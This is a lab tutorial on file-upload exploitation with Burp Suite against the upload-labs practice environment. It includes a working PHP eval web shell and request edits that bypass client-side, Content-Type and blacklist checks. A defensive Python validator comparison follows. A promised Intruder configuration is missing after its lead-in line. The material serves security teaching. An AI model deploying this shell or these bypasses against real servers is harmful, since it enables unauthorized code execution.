Theory is essential, but file upload exploitation is fundamentally a hands-on skill. In this lesson, we will walk through a complete file upload attack using Burp Suite — the industry-standard tool for web application penetration testing. We will use the upload-labs environment that we set up in Lesson 1.
Pass-01 in upload-labs implements only client-side JavaScript validation. The JavaScript checks the file extension and blocks anything that isn't .jpg, .png, or .gif. Let's bypass this step by step.
Step 1: Create a simple PHP web shell for testing:

```php
<?php
@eval($_POST['cmd']);
?>
```

Save this as shell.php. We use $_POST instead of $_GET to avoid the command appearing in server logs, and @ to suppress any PHP errors that might reveal our presence.
Step 2: Configure your browser to use Burp Suite as a proxy (typically 127.0.0.1:8080). Make sure Burp's Intercept is turned on.
Step 3: Navigate to the upload-labs Pass-01 page and select shell.php. Click Upload. The request will be caught by Burp's Intercept.
Step 4: In Burp's Intercept tab, examine the request. You will see something like this:

```http
POST /upload-labs/Pass-01/index.php HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php @eval($_POST['cmd']); ?>
------WebKitFormBoundary
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundary--
```

Step 5: Since this is Pass-01 with only client-side validation, we can simply forward the request as-is. The JavaScript validation already ran in the browser and was satisfied (or we disabled it). Click 'Forward' in Burp.
Step 6: The server responds with the upload path. Request that path and supply cmd=phpinfo() in the body of a POST request (for example from Burp Repeater) to verify code execution. Because the shell reads $_POST, appending ?cmd=phpinfo() to the URL as a query string would not reach it.
Pass-02 validates the Content-Type header on the server side. It only allows image/jpeg, image/png, or image/gif. Here's how to bypass it:
Step 1: Select shell.php and upload it. Intercept the request in Burp.
Step 2: In the intercepted request, locate the Content-Type header within the multipart body part for the file. Change it from application/octet-stream to image/jpeg.
Before modification:

```http
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: application/octet-stream
```

After modification:

```http
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/jpeg
```

Step 3: Forward the request. The server validates the Content-Type, sees image/jpeg, and accepts the upload. The file content is still PHP code.
Pass-03 uses a blacklist to block .php, .asp, .aspx, .jsp, and other dangerous extensions. However, it doesn't block .phtml. Rename shell.php to shell.phtml and upload it.
When testing multiple bypass techniques, Burp Repeater is invaluable. Right-click on an intercepted request and select 'Send to Repeater.' In Repeater, you can modify any part of the request and resend it repeatedly without re-intercepting.
Create a testing matrix in Repeater with different combinations:
| Test # | Filename | Content-Type | Expected Result |
|---|---|---|---|
| 1 | shell.php | application/x-php | Blocked by blacklist |
| 2 | shell.phtml | application/x-php | Allowed — bypass! |
| 3 | shell.php.jpg | image/jpeg | Depends on parsing |
| 4 | shell.php | image/jpeg | Depends on extension check |
| 5 | shell.phtml | image/jpeg | Allowed — double bypass! |
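To see why the Pass-02 (Content-Type) and Pass-03 (blacklist) checks fail against this matrix, and what a server-side check has to do instead, here is an added example that is not part of upload-labs or of the original lesson. It re-implements the two weak checks in Python as the lesson describes them and puts a hardened check (extension allowlist, magic-byte sniff, client-supplied Content-Type ignored) beside them; the blacklist contents, the magic-byte table and the sample upload rows are constructed for the example, and the sixth row is a constructed legitimate JPEG added so the hardened check has something to accept.

```python
"""Three upload validators run over the Repeater matrix from the lesson.
Added example, not upload-labs code; all sample rows are constructed."""
import os

# Constructed view of what the server sees for each matrix row:
# (filename from Content-Disposition, declared part Content-Type, first bytes).
# Rows 1-5 mirror the table above; row 6 is a constructed genuine JPEG.
MATRIX = [
    ("shell.php",     "application/x-php", b"<?php @eval($_POST['cmd']); ?>"),
    ("shell.phtml",   "application/x-php", b"<?php @eval($_POST['cmd']); ?>"),
    ("shell.php.jpg", "image/jpeg",        b"<?php @eval($_POST['cmd']); ?>"),
    ("shell.php",     "image/jpeg",        b"<?php @eval($_POST['cmd']); ?>"),
    ("shell.phtml",   "image/jpeg",        b"<?php @eval($_POST['cmd']); ?>"),
    ("photo.jpg",     "image/jpeg",        b"\xff\xd8\xff\xe0" + b"\x00" * 16),
]

IMAGE_TYPES = {"image/jpeg", "image/png", "image/gif"}
# Constructed subset of a Pass-03 style blacklist; note .phtml is absent.
BLACKLIST = {".php", ".asp", ".aspx", ".jsp"}


def pass02_check(filename, content_type, data):
    """Pass-02 style: trusts the Content-Type the client put in the part."""
    return content_type in IMAGE_TYPES


def pass03_check(filename, content_type, data):
    """Pass-03 style: blacklist applied to the last extension only."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLACKLIST


# Hardened check: allowlist of extensions, each tied to the magic bytes a
# file of that type must start with. The declared Content-Type is ignored.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def hardened_check(filename, content_type, data):
    """Accept only a single, allowlisted extension whose content matches."""
    base = os.path.basename(filename).lower()
    if base.count(".") != 1:            # rejects shell.php.jpg style names
        return False
    ext = os.path.splitext(base)[1]
    magic = ALLOWED.get(ext)
    return magic is not None and data.startswith(magic)


def run_matrix(check):
    """Return the 1-based row numbers that the given validator accepts."""
    return [i for i, (name, ctype, data) in enumerate(MATRIX, start=1)
            if check(name, ctype, data)]


if __name__ == "__main__":
    for label, check in (("Pass-02", pass02_check),
                         ("Pass-03", pass03_check),
                         ("hardened", hardened_check)):
        print(f"{label:9s} accepts rows {run_matrix(check)}")
```

Run stand-alone, the script reports that the Content-Type check accepts rows 3, 4, 5 and 6, the blacklist accepts rows 2, 3, 5 and 6, and the hardened check accepts only row 6. The extension allowlist is the control that decides whether the web server will ever execute the file; the magic-byte check adds depth, and in a real handler the file should also be stored under a server-generated name rather than the client-supplied one.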
💡 Pro tip: Use Burp Intruder for automated testing of multiple extensions. Set the filename as a payload position, load a wordlist of extensions (e.g., from SecLists), and let Intruder test each one automatically. Sort the results by response length or status code to quickly identify which extensions are accepted.
Here's how to configure Burp Intruder for extension testing:
Burp Suite transforms file upload testing from a tedious manual process into a systematic, repeatable methodology. The combination of Intercept (for initial analysis), Repeater (for targeted testing), and Intruder (for automated enumeration) covers the entire testing workflow.